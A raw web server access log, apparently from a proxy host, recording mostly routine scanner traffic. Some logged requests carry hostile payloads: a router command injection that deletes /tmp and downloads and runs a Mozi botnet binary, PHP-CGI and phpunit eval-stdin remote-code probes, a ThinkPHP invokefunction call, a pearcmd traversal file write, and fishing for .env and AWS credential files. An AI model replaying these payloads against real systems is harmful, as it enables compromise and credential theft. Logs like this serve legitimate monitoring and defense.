Edg/90.0.818.46" "-" -[17/Feb/2026:11:46:15 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:11:54:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:12:01:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" -[17/Feb/2026:12:01:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[17/Feb/2026:12:01:33 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:12:01:33 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 115.231.78.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[17/Feb/2026:12:05:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.129.187.38] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[17/Feb/2026:12:05:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.129.187.38] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[17/Feb/2026:12:06:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:12:07:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:12:09:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:12:10:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:12:19:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:12:28:47 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:12:29:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:12:36:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:12:37:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:13:02:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:13:10:11 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:13:14:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.135.193.11] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env.local" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env.staging" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.env.production" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.env.development" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.aws/credentials" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/app/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:14:23 +0000] 404 - GET http 222.117.41.51 "/config.json" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:13:17:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:13:25:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:13:28:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:13:33:34 +0000] 400 - - http localhost "-" [Client 78.135.107.107] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:13:35:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:13:49:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:13:49:13 +0000] 400 - - http localhost "-" [Client 162.142.125.195] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:13:49:38 +0000] 400 - GET http 222.117.41.51 "/security.txt" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:13:51:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:13:52:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:13:52:51 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.242.226.111] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" -[17/Feb/2026:13:55:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.195.168.139] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" -[17/Feb/2026:14:11:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:14:17:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:14:18:41 +0000] 404 - GET http localhost-nginx-proxy-manager "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1" [Client 27.43.206.93] [Length 150] [Gzip -] "-" "-" -[17/Feb/2026:14:21:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 78.135.107.107] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:14:29:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:14:31:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 49.51.166.228] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:14:41:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:14:48:31 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:14:48:32 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[17/Feb/2026:14:48:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:14:48:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:14:48:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[17/Feb/2026:15:09:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:15:09:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:15:12:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 185.247.137.17] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[17/Feb/2026:15:19:51 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[17/Feb/2026:15:25:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:15:25:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:15:34:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:15:41:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:15:57:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:15:59:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:16:03:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.237.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:16:05:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:16:05:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:05:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:06:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:06:09 +0000] 404 - GET http 222.117.41.51 "/version" [Client 36.255.223.98] [Length 150] [Gzip -] "-" "-" -[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:16:06:09 +0000] 404 - GET http 222.117.41.51 "/v1" [Client 36.255.223.98] [Length 150] [Gzip -] "-" "-" -[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:16:06:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[17/Feb/2026:16:06:13 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:16:10:05 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:16:10:06 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:16:10:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:10:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:16:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 129.212.186.7] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:16:36 +0000] 400 - - http localhost "-" [Client 129.212.186.7] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:23:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:16:35:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:16:39:28 +0000] 400 - GET http localhost-nginx-proxy-manager "/w00tw00t.at.ISC.SANS.DFind:)" [Client 52.76.147.90] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:16:48:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:17:00:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 94.72.116.78] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:17:00:49 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 94.72.116.78] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:17:00:50 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:00:53 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 94.72.116.78] [Length 154] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:00:55 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:00:57 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:00:58 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:00 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:03 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:06 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:08 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:09 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:11 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:11 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:12 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:14 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:15 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:16 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:17 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:18 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:19 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:20 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:20 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:22 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:23 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:24 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:26 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:27 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:30 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:17:01:32 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:34 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:36 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:38 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:41 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:44 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:47 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:49 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:51 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:53 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:54 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:56 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:58 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:01:59 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:17:08:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] 